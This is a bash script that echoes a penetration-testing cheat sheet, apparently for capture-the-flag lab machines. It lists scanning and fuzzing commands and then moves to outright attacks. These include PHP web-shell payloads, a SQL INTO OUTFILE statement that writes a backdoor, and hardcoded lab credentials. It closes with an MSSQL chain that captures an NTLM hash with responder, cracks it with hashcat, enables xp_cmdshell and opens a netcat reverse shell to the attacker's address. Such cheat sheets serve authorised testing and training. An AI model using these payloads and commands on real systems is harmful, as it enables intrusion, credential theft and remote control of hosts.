#!/bin/bash

echo '''
alias cc="clear;"
alias ll="clear; ls -lsht --color=auto"
======================================================= ''';echo """
==== Extract ips from a text file
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' file.txt """;echo '''
=======================================================
export ip=10.10.10.10
nmap -p- $ip --open
nmap -p- --min-rate=10000 $ip 
nmap -p- --min-rate=10000 $ip --open
nmap -sC -sV $ip -p21,22

== Nmap http_methods 
nmap -p80,443 --script=http-methods <ip> --scripts-args http-methods.url-path="/directory/goes/here"
=======================================================
autorecon --only-scans-dir -v $ip
=======================================================
nikto -C all -h http://10.10.10.13 
=======================================================
export url=http://10.10.10.12
gobuster dir --url $url -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 40
gobuster dir --url $url -w /usr/share/SecLists/Discovery/Web-Content/raft-medium-files.txt -x php -t 40
gobuster dir --url $url -w /usr/share/SecLists/Discovery/Web-Content/raft-large-files.txt -x php -t 40

=== gobuster for subdomain enumeration
gobuster dns -d domain.org -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 30
Just make sure any dns name you find resolves to an in-scope address before you test in
========================================================
## WFuzz XSS fuzzing
wfuzz -c -z file,/usr/share/wordlists/Fuzzing/XSS.txt "$url"

## COMMAND injection with post data
wfuzz -c -z file,/usr/share/wordlists/Fuzzing/command-injection.txt -d "doi=FUZZ" "url"

## wfuzz html_escape
wfuzz -c -z file,/usr/share/wordlists/Fuzzing/yeah.txt "url"

#Word fuzzing
export url="http://10.10.10.7/FUZZ"
wfuzz -c -z file,/usr/share/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 "$url"
wfuzz -c -z file,/usr/share/SecLists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$url"	
wfuzz -c -z file,/usr/share/SecLists/Discovery/Web-Content/raft-medium-words.txt --hc 404 "$url"
wfuzz -c -z file,/usr/share/SecLists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$url"

#Direcrectory Fuzzing
export url="http://10.10.10.7/FUZZ/"
wfuzz -c -z file,/usr/share/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 "$url"
wfuzz -c -z file,/usr/share/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$url"

==== Authenticated Directories Fuzzing
wfuzz -c -z file,/usr/share/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d "PARAM=value" "$url"

==== Authenticated Files Fuzzing
wfuzz -c -z file,/usr/share/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -d "PARAM=value" "$url"

#Parameter Fuzzing
export url="http://10.10.10.63/error.html?FUZZ=somedata"
wfuzz -c -z file,/usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt --hc 404 "$url"

## UserNames Fuzzing 
wfuzz -c -z file,/usr/share/SecLists/Usernames/top-usernames-shortlist.txt --hc 404,403 "url"

=========================================================
====Command Injection with commix, ssl, waf, random agent
commix --url="https://acbd.com?parameter=" --level=3 --force-ssl --skip-waf --random-agent
=========================================================
== SqlMap==
sqlmap -u $url threads=2 --time-sec=10 --level=2 --risk=2 --technique=1 --force-ssl
sqlmap -u $url threads=2 --time-sec=10 --level=4 --risk=3 --dump
/SecList/Fuzzing/alphanum-case.txt
=========================================================
== Social Recon
theharvester -d domain.org -l 500 -b google
=========================================================
== 
=========================================================
nslookup
server 10.10.10.13
10.10.10.13
dig axfr <domain> @10.10.10.13
=========================================================
smbmap -H 10.10.10.10
smbmap -H 10.10.10.10 -u df

---------
smbclient -L //10.10.10.125
smbclient  //10.10.10.125/share_name
smbclient -N //10.10.10.125/Reports
---------
enum4linux -A 10.10.10.10
---------
nbtscan 
==========================================================
== SMTP user enum
smtp-user-enum -m VRFY -U /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt -t $ip
smtp-user-enum -m EXPN -U /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt -t $ip
smtp-user-enum -m RCPT -U /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt -t $ip
smtp-user-enum -m EXPN -U /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt -t mail.example.tld 25

==========================================================
== Command Execution Varification --> [ Ping Check ]
tcpdump -i eth0 -c5 icmp
======
# Check Network
netdiscover /r 0.0.0.0/24
===== '''; echo """
# INTO OUTFILE D00r
SELECT \"<?php system(\$_GET['cmd']); ?>\" into outfile \"/var/www/WEROOT/backdoor.php\";	""";echo '''
==== 
LFI ?
# php filter check 
php://filter/convert.base64-encode/resource-
==== 
Upload Image ?
GIF89a1
<?php system($_REQUEST["cmd"]); ?>
<? php system($_POST["cmd"]); ?>

============================
mysql -h 127.0.0.1 -P 3306 -u root -p <database>   ''' ;echo """
mssqlclient.py reporting:'PcwTWTHRwryjc\$c6'@10.10.10.125 -windows-auth
============================"""	;echo """
#mssql
mssqlclient.py reporting:'PcwTWTHRwryjc\$c6'@10.10.10.125 -windows-auth
SELECT * FROM fn_my_permissions(NULL, 'SERVER');	--> check our permissions
SELECT name FROM master.sys.databases			--> show db names
use db_name
SELECT name FROM sysobjects WHERE xtype = 'U'
root@kali# responder -I tun0
xp_dirtree '\\\\my_kali_ip\a';		--> we will got ntlm hash in responder tab
hashcat -h | grep -i netntlmv2
hashcat -m 5600 mssql-svc.netntlmv2 /usr/share/wordlists/rockyou.txt -o mssql-svc.netntlmv2.cracked --force
#after getting ntlm cracked hash 
enable_xp_cmdshell
xp_cmdshell whoami
xp_cmdshell \\\\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 443
==========================================="""








